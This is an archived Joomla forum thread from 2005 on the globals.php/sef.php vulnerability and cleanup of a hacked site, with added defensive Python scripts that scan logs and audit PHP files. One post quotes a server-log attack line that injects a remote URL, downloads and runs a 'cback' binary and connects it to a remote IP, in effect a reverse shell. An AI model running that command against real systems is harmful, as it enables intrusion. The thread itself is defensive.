Joomla! Discussion Forums



Posted: Mon Nov 21, 2005 7:39 pm 
Joomla! Explorer

Joined: Fri Aug 12, 2005 10:06 am
Posts: 327
The most important files are:

joomla/globals.php
joomla/includes/sef.php

But we recommend updating the whole package because of various bug fixes.
More info: http://www.joomla.org/content/view/498/74/

Arno

_________________
Joomla! professional services http://www.alvaana.com
http://moovum.com - Get Mollom Anti-Spam on your Joomla! website with Moovur
Follow twitter: @me_arno @jfoobar @moovum


Posted: Tue Nov 22, 2005 2:29 am 
Joomla! Explorer

Joined: Sat Oct 08, 2005 3:25 pm
Posts: 361
Location: Australia
Thanks everyone who worked on the new release.
I will be updating ASAP!  :)

_________________
http://www.persianari.com


Posted: Tue Nov 22, 2005 2:13 pm 
Joomla! Explorer

Joined: Sat Aug 20, 2005 3:15 pm
Posts: 469
Thanks for reacting quickly and putting together this update in a few days.

OK, I know this is not exactly your business, but I do have several Mambo sites that I will not move to Joomla in the near future for practical reasons. So the question is: if I stick to the fix published on Mamboserver, basically fixing index.php, index2.php, and so on, will that be fairly safe? Reading this thread I have two concerns:

1 - Case sensitivity, which seems to mean that at least using one version of PHP, hackers can go flying through the Mambo fix
2 - There is no fix for sef.php. I understand there is no real risk using the Joomla method (updating globals.php), because that will also be used in sef.php, but if globals.php is not fixed, as per the Mambo guys' solution, then the vulnerability still remains?

In other words, what do you think is the best course of action for a Mambo 4.5.2.3 user as of today?

Can someone shed some light?

_________________
See all about sh404sef at http://extensions.siliana.com/2009090780/General/sh404sef-has-a-new-home-at-Anything-Digital.html
I don't reply to PM anymore. Thanks for using sh404SEF


Posted: Fri Nov 25, 2005 8:18 am 
Joomla! Intern

Joined: Mon Sep 05, 2005 7:45 pm
Posts: 74
OK,

I am also wondering what to do here.
I have 7 sites, all running 4523:
- there have been attempts on 4 of them (they remotely executed the command "id" and nothing else)
- one was defaced today (they were able to execute shell commands: ls, cat, wget, rm, mv)

i.e. they had remote shell access as user apache
i.e. they could have wiped out all user-uploaded content like photos in /images/stories/galley, docman documents, etc.

but they didn't!
(they were even kind enough to make backups of everything they changed ;)

So, as a user of 4523 who can't yet upgrade,
I have 2 questions:
  • what exactly do I change in 4523 (I am guessing I should drop in the new globals.php and sef.php)
  • since this can happen in sef.php, what should I look for in other components, modules that people use? (e.g. advanced SEF (are there any known 3rd party packages that are affected?)). I am guessing that if anything else also registers the globals once again, I am not safe unless I do what?


Posted: Mon Nov 28, 2005 4:08 am 
Joomla! Enthusiast

Joined: Sat Aug 13, 2005 2:13 am
Posts: 223
Location: Sweden
Quote:
what exactly do I change in 4523 (I am guessing I should drop in the new globals.php and sef.php)

Preferably use the attached globals.php in Mambo, as Joomla's one can cause errors in admin functionality on some Mambo versions.

Quote:
since this can happen in sef.php, what should I look for in other components, modules that people use? (e.g. advanced SEF (are there any known 3rd party packages that are affected?)). I am guessing that if anything else also registers the globals once again, I am not safe unless I do what?

Even if a 3rd party component extracts globals, you will be safe, as the included globals.php will stop the attack before any other file is processed.



_________________
Emir Sakic
http://www.sakic.net


Posted: Mon Nov 28, 2005 8:02 am 
Joomla! Apprentice

Joined: Fri Aug 19, 2005 8:44 pm
Posts: 9
For those that haven't seen the 'hack' live, here is a line from my Apache-server log:
Code:
70.147.185.*** - - [28/Nov/2005:06:26:33 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.***/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.***/cback;chmod%20744%20cback;./cback%20213.131.236.***%208080;echo%20YYY;echo|  HTTP/1.1" 404 214


I edited out the last part of the IP.

It gets a nice defacekit from some medical site in Italy.
From the defacekit
Quote:



Last edited by Badger on Mon Nov 28, 2005 8:58 am, edited 1 time in total.

Posted: Mon Nov 28, 2005 10:57 am 
Joomla! Guru

Joined: Sat Sep 10, 2005 10:31 pm
Posts: 823
Badger wrote:
For those that haven't seen the 'hack' live, here is a line from my Apache-server log:
Code:
***



Badger, you should not post such details on a public forum. This might give script kiddies some more ideas where to start.

BTW: There are much easier ways than the one you quoted...

_________________
We may not be able to control the wind, but we can always adjust our sails


Posted: Mon Nov 28, 2005 10:58 am 
Joomla! Apprentice

Joined: Fri Aug 19, 2005 8:44 pm
Posts: 9
The genie was already out of the bottle. See the start of the topic for the concept.


Posted: Mon Nov 28, 2005 11:04 am 
Joomla! Ace

Joined: Fri Aug 19, 2005 12:14 am
Posts: 1166
Location: United Kingdom
It gives the uneducated among us an idea of what to look for. I'm glad he put it in. At least now I know what the hell I'm looking for in my logs.

_________________
http://www.jomres.net THE online hotel booking and reservation system for Joomla
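
What to look for in an access log, as an added example that is not part of any post in this thread: it flags requests whose query string names a PHP superglobal as a parameter or points a mosConfig_ variable at a remote URL. The function names and sample log lines are constructed for illustration; the name list follows the error message quoted in this thread, plus _REQUEST from the log line posted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names the patched globals.php refuses (per the error text quoted
# in this thread), plus _request, which appears in the log line posted above.
SUPERGLOBALS = {"globals", "_get", "_post", "_cookie", "_request",
                "_server", "_env", "_files", "_session"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Apache common/combined format: host ident user [time] "METHOD target PROTO" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?)\s+HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client, status, reasons) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        base = name.split("[", 1)[0].lower()  # _REQUEST[option] -> _request
        if base in SUPERGLOBALS:
            reasons.append("superglobal as parameter: " + name)
        if base.startswith("mosconfig_") and REMOTE_URL.match(value):
            reasons.append("remote URL in config variable: " + name)
    return (client, int(status), reasons) if reasons else None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Nov/2005:06:20:01 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Nov/2005:06:26:33 +0100] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://files.example.net/x.gif?  HTTP/1.1" 404 214',
    '198.51.100.9 - - [28/Nov/2005:06:31:12 +0100] "GET /index.php?globals[mosConfig_absolute_path]=1 HTTP/1.1" 200 311',
    '192.0.2.44 - - [28/Nov/2005:06:40:47 +0100] "GET /index.php?option=com_search&searchword=globals HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, status, reasons in scan(SAMPLE_LOG):
        print(client, status, "; ".join(reasons))
```

Access logs record only the request line, so parameters sent by POST or in a cookie will not show up in this scan. A 200 status on a flagged request deserves a closer look than a 404.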


Posted: Mon Nov 28, 2005 5:42 pm 
Joomla! Enthusiast

Joined: Fri Aug 26, 2005 11:09 am
Posts: 182
Saka wrote:
Preferably use attached globals.php in Mambo as Joomla's one can cause errors in admin functionality on some Mambo versions.


Can this be used on Mambo 4.5.1, Saka?

Is it safe to use SEFAdvance on 4.5.1 (actually 4.5.1.3) in the light of these recent exploits?


Posted: Mon Nov 28, 2005 6:51 pm 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 1:08 pm
Posts: 104
Location: Cleveland, OH
It seems that Joomla 1.0.4 is not vulnerable to this attack.

I tried it on my site, I got this error...
Illegal variable _files or _env or _get or _post or _cookie or _server or _session or globals passed to script.

_________________
Tom Parkison
Rochen Staff Member
http://www.rochen.com


Posted: Wed Nov 30, 2005 1:44 pm 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
I installed 1.0.4 the day it came out; all has been fine up until now!

It seems my site has been hacked, I was seeing several

Quote:
Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/includes/joomla.php on line 1025

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 218

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 219

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 220

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 221

Warning: Cannot modify header information - headers already sent by (output started at /home/knightri/public_html/site/language/english.php:539) in /home/knightri/public_html/site/index.php on line 222




and I was not able to log into my admin panel. From there it then decided to download a WMV movie... and that was not tasteful! It's still happening now!

http://www.knightrideruk.co.uk

I have no idea what to do from here on. Please can someone help me?

The URL of the WMV leads to http://server1cuatui.com

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Wed Nov 30, 2005 7:44 pm 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
please anyone? :( :'(

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Wed Nov 30, 2005 10:18 pm 
Bump, devs, on the latest post. Do we have any known vulnerabilities in 1.0.4? Thanks.


Posted: Wed Nov 30, 2005 11:08 pm 
Joomla! Ace

Joined: Fri Aug 19, 2005 12:14 am
Posts: 1166
Location: United Kingdom
Seconded.

I understand if you've all got your heads buried in code looking for solutions, but a quick word to say you're aware of it would help immensely.

Cheers,

_________________
http://www.jomres.net THE online hotel booking and reservation system for Joomla


Posted: Thu Dec 01, 2005 12:16 am 
Joomla! Champion

Joined: Fri Aug 12, 2005 12:47 am
Posts: 6431
There are no known vulnerabilities in 1.0.4. As for the headers already sent out problem:

Delete any extra lines below the PHP closing tag '?>' in the following files:

1. /includes/joomla.php
2. /languages/english.php

That should solve the headers already sent problems.

_________________
Johan Janssens - Joomla Co-Founder, Lead Developer of Joomla 1.5

http://www.nooku.org - multi-lingual content manager and rapid extension development framework for Joomla 1.5
http://www.joomlatools.eu - training, consulting and extension development


Posted: Thu Dec 01, 2005 9:08 am 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
I lost the errors, but I still seem to have this URL linking to this horrid video. I will check out those other files... failing that, I have a full SQL and PHP backup from a while ago... what do I need to do to reinstate that?

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Thu Dec 01, 2005 1:09 pm 
Thanks Jinx.


Posted: Thu Dec 01, 2005 5:17 pm 
Joomla! Enthusiast

Joined: Sat Aug 13, 2005 2:13 am
Posts: 223
Location: Sweden
kper wrote:
Can this be used on Mambo 4.5.1, Saka?

Yes.

kper wrote:
Is it safe to use SEFAdvance on 4.5.1 (actually 4.5.1.3) in the light of these recent exploits?

Be sure to update to latest version (4.2.4). And apply this globals.php and you should be safe.

_________________
Emir Sakic
http://www.sakic.net


Posted: Fri Dec 02, 2005 12:11 am 
Joomla! Enthusiast

Joined: Fri Aug 26, 2005 11:09 am
Posts: 182
Thanks. Advice much appreciated.

I presume there is, similarly, no harm in using this globals.php with the code snippet offered by the Mambo people for inclusion in index(x).php files?


Posted: Fri Dec 02, 2005 12:16 am 
Joomla! Ace

Joined: Fri Aug 19, 2005 12:14 am
Posts: 1166
Location: United Kingdom
Jinx wrote:
There are no known vulnerabilities in 1.0.4.


Thanks for that Jinx.

_________________
http://www.jomres.net THE online hotel booking and reservation system for Joomla


Posted: Mon Dec 05, 2005 9:12 am 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
I'm sorry but I still require some help. When I go to my website after a few secs it directs completely to http://www.coolrip.com/

Why is this happening and where should I be looking to change?

This has gone on for ages now and really want people seeing my website not this http://www.coolrip.com. How could they have got in and directed them away?

http://www.knightrideruk.co.uk

Please can someone help me!

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Mon Dec 05, 2005 10:16 am 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 2:23 pm
Posts: 170
I am not an expert in this area but I think you should check your .htaccess in the root of your Joomla directory.  I think it is in this file that the redirect may have been configured.

_________________
Dell Special Offers, Cheapest Deals and Evalue Codes
Discount Voucher Codes


Posted: Mon Dec 05, 2005 10:33 am 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
My Joomla DIR is called SITE and yes there is a htaccess.txt which contains the following.

Quote:
##
# @version $Id: htaccess.txt 1005 2005-11-13 17:33:59Z stingrey $
# @package Joomla
# @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

Options +FollowSymLinks

#
#  mod_rewrite in use
#

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update YourJoomlaDirectory (just / for root)

# RewriteBase /YourJoomlaDirectory

#
#  Rules
#

RewriteCond %{REQUEST_FILENAME} !\.(jpg|jpeg|gif|png|css|js|pl|txt)$
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php


Nothing about coolrip.com

Could some sort of SQL injection have been made so it does this? Man, I'm so confused.

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Mon Dec 05, 2005 11:19 am 
Joomla! Ace

Joined: Thu Aug 18, 2005 9:06 am
Posts: 1465
nickpledge wrote:
I'm sorry but I still require some help. When I go to my website after a few secs it directs completely to http://www.coolrip.com/

You should just check what JavaScript you have on your page... look at the page source of your site, it references JavaScript from: domainstat.net/stat.php
(that does the redirect to coolrip)

But now please don't ask "Help, where is it coming from?"... that you need to find out by yourself... look at relevant files... could possibly be the template's index.php (but it is hard to tell by just looking at the page source).

_________________
http://de.siteof.de/
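
A file-system check for the two cleanup steps suggested in this thread (extra lines after the closing '?>', and a script tag pulling JavaScript from a foreign host), as an added example that is not part of any post. The function names, the allow-list and every file in the demo tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Captures the host of <script src="http://host/..."> or src="//host/..."
SCRIPT_SRC = re.compile(rb"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)

def trailing_output(data):
    """Bytes PHP would send to the browser after the last '?>' (b'' if none)."""
    pos = data.rfind(b"?>")
    tail = data[pos + 2:] if pos >= 0 else b""
    for newline in (b"\r\n", b"\n"):  # PHP swallows one newline after '?>'
        if tail.startswith(newline):
            return tail[len(newline):]
    return tail

def audit(root, allowed_hosts=()):
    """Map relative path -> findings for every .php file under root."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        data = path.read_bytes()
        hosts = {h.decode("ascii", "replace").lower() for h in SCRIPT_SRC.findall(data)}
        foreign = sorted(hosts - set(allowed_hosts))
        found = {}
        if trailing_output(data):
            found["bytes_after_close_tag"] = len(trailing_output(data))
        if foreign:
            found["external_script_hosts"] = foreign
        if found:
            report[path.relative_to(root).as_posix()] = found
    return report

def demo():
    """Audit a constructed three-file tree (all contents are made up)."""
    files = {
        "includes/clean.php": b"<?php\n$x = 1;\n?>\n",
        "language/english.php": b"<?php\ndefine('_HELLO', 'Hi');\n?>\n\n \n",
        "templates/t/index.php": b'<script src="http://stats.example.net/s.php"></script>'
                                 b'<script src="//www.example.org/m.js"></script><?php echo 1; ?>\n',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            Path(tmp, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, rel).write_bytes(body)
        return audit(tmp, allowed_hosts={"www.example.org"})

if __name__ == "__main__":
    for rel, found in demo().items():
        print(rel, found)
```

Template files normally carry HTML after their last '?>', so the trailing-bytes finding is meaningful mainly for include and language files. Comparing flagged files against a clean copy of the release shows whether the extra content was added after installation.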


Posted: Mon Dec 05, 2005 11:35 am 
Joomla! Intern

Joined: Fri Aug 19, 2005 5:07 pm
Posts: 86
Location: UK
I asked for "help" as many others or if a few may have had the same issue. Sorry if I'm out of line...  :-\

_________________
Forum Rules: http://forum.joomla.org/index.php/topic,65.0.html
"[Signatures] May NOT contain any images."


Posted: Mon Dec 05, 2005 11:51 am 
Joomla! Ace

Joined: Thu Aug 18, 2005 9:06 am
Posts: 1465
nickpledge wrote:
I asked for "help" as many others or if a few may have had the same issue. Sorry if I'm out of line...  :-\

Sorry, I just wanted to mention that in advance... because that was a common question (the where) after telling someone what is wrong (maybe somehow seemingly automatic).
By myself I just think that a separate thread would be better... but that's just me and I wasn't trying to tell that you did anything wrong ;-)

_________________
http://de.siteof.de/

